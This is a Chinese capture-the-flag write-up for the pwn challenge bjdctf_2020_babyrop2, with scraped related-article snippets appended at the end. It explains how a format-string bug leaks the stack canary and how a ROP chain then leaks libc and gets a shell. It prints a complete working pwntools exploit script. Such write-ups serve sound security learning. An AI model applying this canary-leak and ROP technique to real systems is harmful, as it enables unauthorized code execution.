这道题是一道基本题,正因为它经典,所以需要重点记录一下。

  这道题考察格式化字符串泄露canary,然后rop获得libc版本,之后拿到shell。拿到程序之后我们先检查一下保护。。。

  开启了堆栈不可执行和canary保护。接下来ida看一下伪代码吧!

  main函数中调用了三个函数,我们一个一个点进去看看,先看一下init()。

  有点水文章了。。。第一和函数就是告诉我们说让门尽力泄露libc的版本。。。来,我们继续看第二个函数!

  很明显有一个格式化字符串漏洞,并且format是由我们控制的,这里呢,我们先算一下这个格式化字符串的偏移吧。你看scanf那里,允许我们输入6个字节。。。那么我们就开始撞运气泄露偏移吧。。。

  当我们输入泄露偏移为6处的地址时,找到6161也就是aa,那么说明格式化字符串的偏移就是6,这里我们就要泄露canary,canary是在rbp+8,那么我们只要算好偏移泄露就可以了。

  这里的时候我们是输入了%6$p,看栈分布,说明我们只要输入%7$p,就把canary泄露出来了。我们直接运行程序看看。

  输出的这个就是canary,%p就是以十六进制输出数据。

  好,接下来我们看最后一个函数。

  

  就是简单的栈溢出,构造rop链了。

  接下来来看看payload怎么构造。

1 payload = p64(cancry)

2 payload = payload.rjust(0x20,'a')

3 payload += 'bbbbbbbb'

4 payload += p64(pop_rdi)

5 payload += p64(puts_got)

6 payload += p64(puts_plt)

7 payload += p64(ret_addr)

  

  把rbp+8的位置放上canary,下来就是简单泄露libc版本,调用shell了。

贴一下完整的exp:

 1 from pwn import *

 2 import time

 3

 4 p = process('./bjdctf_2020_babyrop2')

 5 elf = ELF('./bjdctf_2020_babyrop2')

 6 context.log_level = 'debug'

 7

 8 p.recv()

 9 payload = '%7$p'

10 p.sendline(payload)

11 p.recvuntil('0x')

12 cancry = int(p.recv(16),16)

13

14 puts_plt = 0x0400610

15 puts_got = elf.got['puts']

16 pop_rdi = 0x0400993

17 main_addr = elf.symbols['main']

18 ret_addr = 0x0400887

19

20 sleep(1)

21 payload = p64(cancry)

22 payload = payload.rjust(0x20,'a')

23 payload += 'bbbbbbbb'

24 payload += p64(pop_rdi)

25 payload += p64(puts_got)

26 payload += p64(puts_plt)

27 payload += p64(ret_addr)

28 p.recvuntil('story!\n')

29 p.sendline(payload)

30 puts_addr = u64(p.recv(6).ljust(8,'\x00'))

31 print hex(puts_addr)

32

33 base_addr = puts_addr - 0x06f690

34 shell_addr = base_addr + 0x45216

35 p.recvuntil('story!\n')

36 payload = p64(cancry)

37 payload = payload.rjust(0x20,'a')

38 payload += 'bbbbbbbb'

39 payload += p64(shell_addr)

40 p.sendline(payload)

41 p.interactive()

42 p.close()

bjdctf_2020_babyrop2的更多相关文章

  1. [BUUCTF]PWN——bjdctf_2020_babyrop2

    bjdctf_2020_babyrop2 附件 步骤: 例行检查,64位程序,开启了NX和canary保护 2. 试运行一下程序,看看大概的情况 提示我们去泄露libc 3. 64位ida载入,从ma ...

  2. bjdctf_2020_babyrop2(没有成功拿到shell)

    看到程序先例行检查一下 可以看到开启了canary和nx保护,需要注意的是这个acnary 将程序放入ida中shift+f12 没有关键性函数.我们进入main函数中 在main的gift程序里面我 ...

  3. [BUUCTF-Pwn]刷题记录1

    [BUUCTF-Pwn]刷题记录1 力争从今天(2021.3.23)开始每日至少一道吧--在这里记录一些栈相关的题目. 最近更新(2021.5.8) 如果我的解题步骤中有不正确的理解或不恰当的表述,希 ...

随机推荐

  1. [loj6254]最优卡组

    特殊处理$c_{i}=1$的$i$,显然对这些$a_{i,1}$求和即可,以下都假设$c_{i}\ge 2$ 对于每一个$i$,将$a_{i,j}$从大到小排序:接下来,对于所有$i$,按照$a_{i ...

  2. [bzoj3351]Regions

    这道题有一种较为暴力的做法,对于每个点枚举所有与r2为该属性的询问并加以修改,最坏时间复杂度为o(nq),然而是可过的(97s) 发现只有当r2相同的询问数特别多时才会达到最坏时间复杂度,因此如果删除 ...

  3. [luogu4548]歌唱王国

    (可以参考hdu4652,因此推导过程比较省略) 类似的定义$f_{i}$和$g_{i}$,同样去插入$len$个字符,但注意到并不是任意一个位置都可以作为结尾,$i+j$可以作为结尾当且仅当$s[0 ...

  4. Java设计模式之(七)——装饰器模式

    1.什么是装饰器模式? Attach additional responsibilities to an object dynamically keeping the same interface.D ...

  5. Kubernetes:了解 Deployment

    本文为作者的 Kubernetes 系列电子书的一部分,电子书已经开源,欢迎关注,电子书浏览地址: https://k8s.whuanle.cn[适合国内访问] https://ek8s.whuanl ...

  6. CF1004D Sonya and Matrix

    不要想当然. 考虑到我们一定有存在个数为\(4\)的倍数的数. 否则第一个不是的数即为\(x\). 那么我们设\(b\)为所有的数的最大值. 那么显然有\(|n - x| + |m - y| = b\ ...

  7. ARC128D

    考虑我们直接\(dp\). 那么需要快速的求出一段是否可以被消掉只剩两端. 我们可以考虑反过来做的. 我们知道如果全为\(abab\)型或者\(aa\)型则无法消掉 那么我们要前缀和,以及遇到\(aa ...

  8. 【POJ3614 Sunscreen】【贪心】

    题面: 有c头牛,需要的亮度在[min_ci,max_ci]中,有n种药,每种m瓶,可以使亮度变为v 问最多能满足多少头牛 算法 我们自然考虑贪心,我们首先对每头牛的min进行排序,然后对于每种药,将 ...

  9. Codeforces 961F - k-substrings(二分+哈希)

    Codeforces 题面传送门 & 洛谷题面传送门 介绍一种奇怪的 \(\Theta(n\log n)\) 的奇怪做法. 注意到这个"border 的长度必须是奇数"的条 ...

  10. DirectX12 3D 游戏开发与实战第九章内容(下)

    仅供个人学习使用,请勿转载.谢谢! 9.纹理贴图 学习目标 学习如何将局部纹理映射到网格三角形中 探究如何创建和启用纹理 学会如何通过纹理过滤来创建更加平滑的图像 探索如何使用寻址模式来进行多次贴图 ...